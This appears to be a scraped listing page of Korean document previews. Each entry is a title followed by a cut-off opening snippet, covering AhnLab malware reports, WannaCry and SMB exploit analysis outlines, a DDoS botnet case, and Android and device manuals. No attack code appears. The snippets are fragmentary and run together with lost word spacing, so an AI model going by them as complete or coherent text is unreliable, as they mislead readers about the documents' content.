Security Trend ASEC Report VOL.54 June, 2014 ASEC Report VOL.54 June, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationMicrosoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]
Google Map View 구현 학습목표 교육목표 Google Map View 구현 Google Map 지원 Emulator 생성 Google Map API Key 위도 / 경도구하기 위도 / 경도에따른 Google Map View 구현 Zoom Controller 구현 Google Map View (1) () Google g Map View 기능 Google
More information목차 01. 개요 감염경로 워너크립터동작방식 ) 동작과정상세분석 ) 감염증상 ) 파일암호화및복호화방식 안랩대응현황 AhnLab, Inc. All rights reserved.
Trojan/Win32.WannaCryptor 상세분석 안랩시큐리티대응센터 (ASEC) 분석팀 경기도성남시분당구판교역로 220 ( 우 ) 13493 대표전화 : 031-722-8000 팩스 : 031-722-8901 www.ahnlab.com AhnLab, Inc. All rights reserved. 목차 01. 개요... 3 02. 감염경로... 4 03.
More informationSecurity Trend ASEC Report VOL.55 July, 2014
Security Trend ASEC Report VOL.55 July, 2014 ASEC Report VOL.55 July, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More information개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-
개인정보보호의 이해와 안전한 관리 - 안전한 개인정보 관리- 2013. 6. 26 최 윤 형 (한국정보화진흥원) 1 안전한 개인PC 관리방법 목 차 2 안전한 스마트폰 관리방법 1. 안전한 개인PC 관리방법 정보통신 기기의 보안 위협요인 위협요소 웜, 바이러스, 악성코드, DDos공격침입, 네트워크 공격 휴대성, 이동성 오픈 플랫폼 3G, WiFi, Wibro
More information목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault
사용자매뉴얼 JetFlash Vault 100 ( 버전 1.0) 1 목차 1. 시스템요구사항... 3 2. 암호및힌트설정 ( 윈도우 )... 3 3. JetFlash Vault 시작하기 ( 윈도우 )... 7 4. JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault 찾아보기... 10 JetFlash
More informationMicrosoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx
To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 개발환경구조및설치순서 JDK 설치 Eclipse 설치 안드로이드 SDK 설치 ADT(Androd Development Tools) 설치 AVD(Android Virtual Device) 생성 Hello Android! 2 Eclipse (IDE) JDK Android SDK with
More information월간 2016. 02 CONTENTS 3 EXPERT COLUMN 영화 오블리비언과 C&C 서버 4 PRODUCT ISSUE 안랩, 새로워진 'V3 모바일 시큐리티' 출시 고도화되는 모바일 위협, 해답은? 6 SPECIAL REPORT 유포 방법에서 예방까지 모바일 랜
안랩 온라인 보안 매거진 2016. 02 Mobile Security 월간 2016. 02 CONTENTS 3 EXPERT COLUMN 영화 오블리비언과 C&C 서버 4 PRODUCT ISSUE 안랩, 새로워진 'V3 모바일 시큐리티' 출시 고도화되는 모바일 위협, 해답은? 6 SPECIAL REPORT 유포 방법에서 예방까지 모바일 랜섬웨어의 모든 것 모바일까지
More informationNX1000_Ver1.1
See the world in perfect detail 1 2 3 4 J J KL t P A S M i g s v B 5 6 t P A S M i E PASM Z g s v 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 Chapter 1 25 12 11 10 9 1 2 3 4 5 6 7 8 1 t P A S M i g
More information목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.
소프트웨어매뉴얼 윈도우드라이버 Rev. 3.03 SLP-TX220 / TX223 SLP-TX420 / TX423 SLP-TX400 / TX403 SLP-DX220 / DX223 SLP-DX420 / DX423 SLP-DL410 / DL413 SLP-T400 / T403 SLP-T400R / T403R SLP-D220 / D223 SLP-D420 / D423
More informationMicrosoft Word - windows server 2003 수동설치_non pro support_.doc
Windows Server 2003 수동 설치 가이드 INDEX 운영체제 설치 준비과정 1 드라이버를 위한 플로피 디스크 작성 2 드라이버를 위한 USB 메모리 작성 7 운영체제 설치 과정 14 Boot Sequence 변경 14 컨트롤러 드라이버 수동 설치 15 운영체제 설치 17 운영체제 설치 준비 과정 Windows Server 2003 에는 기본적으로
More informationASEC Report VOL.59 November, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에
Security Trend ASEC Report VOL.59 November, 2014 ASEC Report VOL.59 November, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationMicrosoft Word - src.doc
IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...
More informationInstall stm32cubemx and st-link utility
STM32CubeMX and ST-LINK Utility for STM32 Development 본문서는 ST Microelectronics 의 ARM Cortex-M 시리즈 Microcontroller 개발을위해제공되는 STM32CubeMX 와 STM32 ST-LINK Utility 프로그램의설치과정을설명합니다. 본문서는 Microsoft Windows 7
More information어댑터뷰
04 커스텀어댑터뷰 (Custom Adapter View) 커스텀어댑터뷰 (Custom Adapter View) 커스텀어댑터뷰 (Custom Adatper View) 란? u 어댑터뷰의항목하나는단순한문자열이나이미지뿐만아니라, 임의의뷰가될수 있음 이미지뷰 u 커스텀어댑터뷰설정절차 1 2 항목을위한 XML 레이아웃정의 어댑터정의 3 어댑터를생성하고어댑터뷰객체에연결
More information아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상
Android 용 Brother Image Viewer 설명서 버전 0 KOR 아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상표입니다. Android는
More information1
1 2 3 4 5 6 b b t P A S M T U s 7 m P P 8 t P A S M T U s 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 Chapter 1 29 1 2 3 4 18 17 16 15 5 6 7 8 9 14 13 12 11 10 1 2 3 4 5 9 10 11 12 13 14 15
More information<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>
웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.
More informationMobile Service > IAP > Android SDK [ ] IAP SDK TOAST SDK. IAP SDK. Android Studio IDE Android SDK Version (API Level 10). Name Reference V
Mobile Service > IAP > Android SDK IAP SDK TOAST SDK. IAP SDK. Android Studio IDE 2.3.3 Android SDK Version 2.3.3 (API Level 10). Name Reference Version License okhttp http://square.github.io/okhttp/ 1.5.4
More informationWindows Server 2012
Windows Server 2012 Shared Nothing Live Migration Shared Nothing Live Migration 은 SMB Live Migration 방식과다른점은 VM 데이터파일의위치입니다. Shared Nothing Live Migration 방식은 Hyper-V 호스트의로컬디스크에 VM 데이터파일이위치합니다. 반면에, SMB
More information<32BDBAB8B6C6AEC6F9B1DDC0B6B0C5B7A13130B0E8B8EDBEC8B3BBBCAD2E687770>
스마트폰 금융거래 10계명 안내서 배 경 금융감독원은 국내의 스마트폰 이용 활성화를 계기로 10.1월 스마트폰 전자금융서비스 안전 대책을 수립하여 금융회사가 안전한 스마트폰 금융서비스를 제공하기 위한 기반을 마련 하였습니다. 더욱 안전한 전자금융거래를 위해서는 서비스를 제공하는 금융회사뿐만 아니라, 금융소비자 스스로도 금융정보 유출, 부정거래 등 전자금융사고
More informationC스토어 사용자 매뉴얼
쪽지 APP 디자인적용가이드 I. 쪽지 APP 소개 2 I. 쪽지 APP 소개 쪽지 APP 을통해쇼핑몰의특정회원또는특정등급의회원그룹에게 알림메시지나마케팅을위한쪽지를발송하실수있습니다. 쪽지 APP의주요기능 1. 전체회원, 특정ID, 특정회원그룹별로쪽지발송가능 2. 발송예약기능 3. 발송한쪽지에대해수신및열람내역조회가능 4. 쇼핑몰페이지에서쪽지함과쪽지알림창제공 3
More informationCODESYS 런타임 설치과정
CODESYS 런타임설치과정 CODESYS Control RTE / SoftMotion RTE Setup Web: www.altsoft.kr E-mail: altsoft@altsoft.kr Tel: 02-547-2344 목 차 CODESYS 런타임 - Control RTE, SoftMotion RTE... 2 다운로드및설치과정... 2 CODESYS EtherCAT
More informationvar answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");
자바스크립트 (JavaScript) - HTML 은사용자에게인터페이스 (interface) 를제공하는언어 - 자바스크립트는서버로데이터를전송하지않고서할수있는데이터처리를수행한다. - 자바스크립트는 HTML 나 JSP 에서작성할수있고 ( 내부스크립트 ), 별도의파일로도작성이가능하다 ( 외 부스크립트 ). - 내부스크립트 - 외부스크립트
More information인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷
인터넷비즈니스의안심코드, AhnLab Online Security 2.0 멀티브라우저지원! 블루투스키보드지원! 메모리해킹방어! 웹페이지변조및스크린캡처차단! 정보유출걱정없이비즈니스가완성됩니다 보안전용브라우저 AOS Secure Browser 키보드보안서비스 AOS anti-keylogger 온라인 PC 방화벽 AOS firewall 온라인통합방역서비스 AOS
More informationBEA_WebLogic.hwp
BEA WebLogic Server SSL 설정방법 - Ver 1.0-2008. 6 개정이력 버전개정일개정내용 Ver 1.0 2008 년 6 월 BEA WebLogic Server SSL 설명서최초작성 본문서는정보통신부 한국정보보호진흥원의 보안서버구축가이드 를참고하여작성되었습니다. 본문서내용의무단도용및사용을금합니다. < 목차 > 1. 개인키및 CSR 생성방법
More informationSecurity Trend ASEC Report VOL.51 March, 2014
Security Trend ASEC Report VOL.51 March, 2014 ASEC Report VOL.51 March, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More information다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");
다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher
More informationTHE TITLE
Android System & Launcher Team 8 목차 Android 1) Android Feature 2) Android Architecture 3) Android 개발방법 4) Android Booting Process Dalvik 1) Dalvik VM 2) Dalvik VM Instance Application 1) Application Package
More informationSecurity Trend ASEC REPORT VOL.64 April, 2015
Security Trend ASEC REPORT VOL.64 April, 2015 ASEC REPORT VOL.64 April, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More information08_spam.hwp
1. 개요 최근국내외에서 E-card 발송을가장한스팸메일로인하여악성코드에감염되는피해가다수보고되었다. 악성코드는메일본문에악의적인 URL을삽입및클릭을유도하는방식으로스팸메일을발송한다. 사용자가스팸메일에포함되어있는악성URL을클릭할경우감염될수있으며, 감염후에는악성코드가감염PC내에저장되어있는메일주소들을추출하여해당주소로동일유형의스팸메일을발송하게된다. 또한, P2P를통한명령전달및추가악성코드다운로드등의악성행위가예상되므로사용자는
More information1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation
1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation Board(EVB B/D) 들과 TCP/IP Protocol로연결되며, 연결된 TCP/IP
More informationEndpoint Protector - Active Directory Deployment Guide
Version 1.0.0.1 Active Directory 배포가이드 I Endpoint Protector Active Directory Deployment Guide 목차 1. 소개...1 2. WMI 필터생성... 2 3. EPP 배포 GPO 생성... 9 4. 각각의 GPO 에해당하는 WMI 연결... 12 5.OU 에 GPO 연결... 14 6. 중요공지사항
More informationPathEye 공식 블로그 다운로드 받으세요!! 지속적으로 업그래이드 됩니다. 여러분의 의견을 주시면 개발에 반영하겠 습니다.
PathEye Mobile Ver. 0.71b 2009. 3. 17 By PathEye 공식 블로그 다운로드 받으세요!! http://blog.patheye.com 지속적으로 업그래이드 됩니다. 여러분의 의견을 주시면 개발에 반영하겠 습니다. PathEye 설치 1/3 최종 배포 버전을 다 운로드 받습니다. 다운로드된 파일은 CAB 파일입니다. CAB 파일에는
More informationICAS CADWorx SPLM License 평가판설치가이드
ICAS CADWorx SPLM License 평가판설치가이드 CADWorx SPLM License 평가판설치가이드 설치권장사항 Operating System Compatibility ( 반드시 AutoCAD 가설치되어있어야합니다.) 추천시스템 3.0 GHz Intel Pentium IV or greater Windows XP Professional or later
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture3-2 Malware Analysis #3-2 Agenda 안드로이드악성코드분석 악성코드분석 안드로이드악성코드정적분석 APK 추출 #1 adb 명령 안드로이드에설치된패키지리스트추출 adb shell pm list packages v0nui-macbook-pro-2:lecture3 v0n$
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More information1부
PART 1 2 PART 01 _ SECTION 01 API NOTE SECTION 02 3 SECTION 02 GPL Apache2 NOTE 4 PART 01 _ SECTION 03 (Proyo) 2 2 2 1 2 2 : 2 2 Dalvik JIT(Just In Time) CPU 2~5 2~3 : (Adobe Flash) (Air) : SD : : : SECTION
More information( )부록
A ppendix 1 2010 5 21 SDK 2.2. 2.1 SDK. DevGuide SDK. 2.2 Frozen Yoghurt Froyo. Donut, Cupcake, Eclair 1. Froyo (Ginger Bread) 2010. Froyo Eclair 0.1.. 2.2. UI,... 2.2. PC 850 CPU Froyo......... 2. 2.1.
More informationserver name>/arcgis/rest/services server name>/<web adaptor name>/rest/services ArcGIS 10.1 for Server System requirements - 지
ArcGIS for Server (Windows) 설치가이드 ArcGIS 10.2 for Server 설치변경사항 1 설치 간편해진설치 -.Net Framework나 Java Runtime 요구하지않음 - 웹서버 (IIS, WebSphere ) 와별도로분리되어순수하게웹서비스기반의 GIS 서버역할 - ArcGIS Server 계정을이용한서비스운영. 더이상 SOM,
More information메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for
메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More informationchap 5: Trees
5. Threaded Binary Tree 기본개념 n 개의노드를갖는이진트리에는 2n 개의링크가존재 2n 개의링크중에 n + 1 개의링크값은 null Null 링크를다른노드에대한포인터로대체 Threads Thread 의이용 ptr left_child = NULL 일경우, ptr left_child 를 ptr 의 inorder predecessor 를가리키도록변경
More information월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부
월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More information#WI DNS DDoS 공격악성코드분석
#WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음
More informationMicrosoft PowerPoint UI-Event.Notification(1.5h).pptx
To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 UI 이벤트 Event listener Touch mode Focus handling Notification Basic toast notification Customized toast notification Status bar notification 2 사용자가인터랙션하는특정 View
More information< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10
(https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)
More information사용설명서를 읽기 전에 ios용 아이디스 모바일은 네트워크 연결을 통해 ios 플랫폼 기반의 모바일 기기(iOS 버전 6.0 이상의 ipod Touch, iphone 또는 ipad)에서 장치(DVR, 네트워크 비디오 서버 및 네트워크 카메라)에 접속하여 원격으로 영상을
IDIS Mobile ios 사용설명서 Powered by 사용설명서를 읽기 전에 ios용 아이디스 모바일은 네트워크 연결을 통해 ios 플랫폼 기반의 모바일 기기(iOS 버전 6.0 이상의 ipod Touch, iphone 또는 ipad)에서 장치(DVR, 네트워크 비디오 서버 및 네트워크 카메라)에 접속하여 원격으로 영상을 감시할 수 있는 프로그램입니다.
More information기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다.
PDMLink 에등록된 Office 문서들의 PDF 문서변환기능및 Viewer 기능을알아보자 PDM Link에서지원하는 [Product View Document Support] 기능은 Windows-Base 기반의 Microsoft Office 문서들을 PDMLink용 Viewer인 Product View를통한읽기가가능한 PDF Format 으로변환하는기능이다.
More informationSplentec V-WORM Quick Installation Guide Version: 1.0 Contact Information 올리브텍 주소 : 경기도성남시분당구구미로 11 ( 포인트타운 701호 ) URL: E-M
Splentec V-WORM Quick Installation Guide Version: 1.0 Contact Information 올리브텍 주소 : 경기도성남시분당구구미로 11 ( 포인트타운 701호 ) URL: http://www.olivetech.co.kr E-Mail: tech@olivetech.co.kr TEL: 031-726-4217 FAX: 031-726-4219
More informationPowerPoint Presentation
객체지향프로그래밍 클래스, 객체, 메소드 ( 실습 ) 손시운 ssw5176@kangwon.ac.kr 예제 1. 필드만있는클래스 텔레비젼 2 예제 1. 필드만있는클래스 3 예제 2. 여러개의객체생성하기 4 5 예제 3. 메소드가추가된클래스 public class Television { int channel; // 채널번호 int volume; // 볼륨 boolean
More informationRHEV 2.2 인증서 만료 확인 및 갱신
2018/09/28 03:56 1/2 목차... 1 인증서 확인... 1 인증서 종류와 확인... 4 RHEVM CA... 5 FQDN 개인 인증서... 5 레드햇 인증서 - 코드 서명 인증서... 6 호스트 인증... 7 참고사항... 8 관련링크... 8 AllThatLinux! - http://allthatlinux.com/dokuwiki/ rhev_2.2_
More informationASEC REPORT VOL 년 4 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안
ASEC REPORT VOL.89 2017 년 4 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며, 주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다.
More information4S 1차년도 평가 발표자료
모바일 S/W 프로그래밍 안드로이드개발환경설치 2012.09.05. 오병우 모바일공학과 JDK (Java Development Kit) SE (Standard Edition) 설치순서 Eclipse ADT (Android Development Tool) Plug-in Android SDK (Software Development Kit) SDK Components
More information목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응
MALWARE ANALYSIS REPORT WannaCry 랜섬웨어분석 #2 SMB 취약점분석 목차 1. 개요... 3 1.1 배경... 3 1.2 파일정보... 3 2. 상세분석... 4 2.1 SMB 취약점공격흐름... 4 2.2 특징적인행위... 11 3. 대응... 12-2 - 1. 개요 1.1 배경 2017년 5월 17일배포한 WannaCry 분석보고서에도언급되었듯이,
More information` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10
월간악성코드은닉사이트탐지 동향보고서 5 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More informationMango-IMX6Q mfgtool을 이용한 이미지 Write하기
Mango-IMX6Q mfgtool 을 이용한이미지 Write 하기 http://www.mangoboard.com/ http://cafe.naver.com/embeddedcrazyboys Crazy Embedded Laboratory www.mangoboard.com cafe.naver.com/embeddedcrazyboys CRZ Technology 1 Document
More informationtiawPlot ac 사용방법
tiawplot ac 매뉴얼 BORISOFT www.borisoft.co.kr park.ji@borisoft.co.kr HP : 00-370-077 Chapter 프로그램설치. 프로그램설치 3 2 Chapter tiawplot ac 사용하기.tiawPlot ac 소개 2.tiawPlot ac 실행하기 3. 도면파일등록및삭제 4. 출력장치설정 5. 출력옵션설정
More information로거 자료실
redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...
More information2) 활동하기 활동개요 활동과정 [ 예제 10-1]main.xml 1 <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" 2 xmlns:tools="http://schemas.android.
10 차시파일처리 1 학습목표 내장메모리의파일을처리하는방법을배운다. SD 카드의파일을처리하는방법을배운다. 2 확인해볼까? 3 내장메모리파일처리 1) 학습하기 [ 그림 10-1] 내장메모리를사용한파일처리 2) 활동하기 활동개요 활동과정 [ 예제 10-1]main.xml 1
More informationASEC Report 2014 Annual Report ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성
Security Trend ASEC Report 2014 Annual Report ASEC Report 2014 Annual Report ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationPowerPoint 프레젠테이션
System Software Experiment 1 Lecture 5 - Array Spring 2019 Hwansoo Han (hhan@skku.edu) Advanced Research on Compilers and Systems, ARCS LAB Sungkyunkwan University http://arcs.skku.edu/ 1 배열 (Array) 동일한타입의데이터가여러개저장되어있는저장장소
More information<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CBED0C3E0C7C1B7CEB1D7B7A55C D616E2E637070>
#include "stdafx.h" #include "Huffman.h" 1 /* 비트의부분을뽑아내는함수 */ unsigned HF::bits(unsigned x, int k, int j) return (x >> k) & ~(~0
More information메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 fo
메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)
More information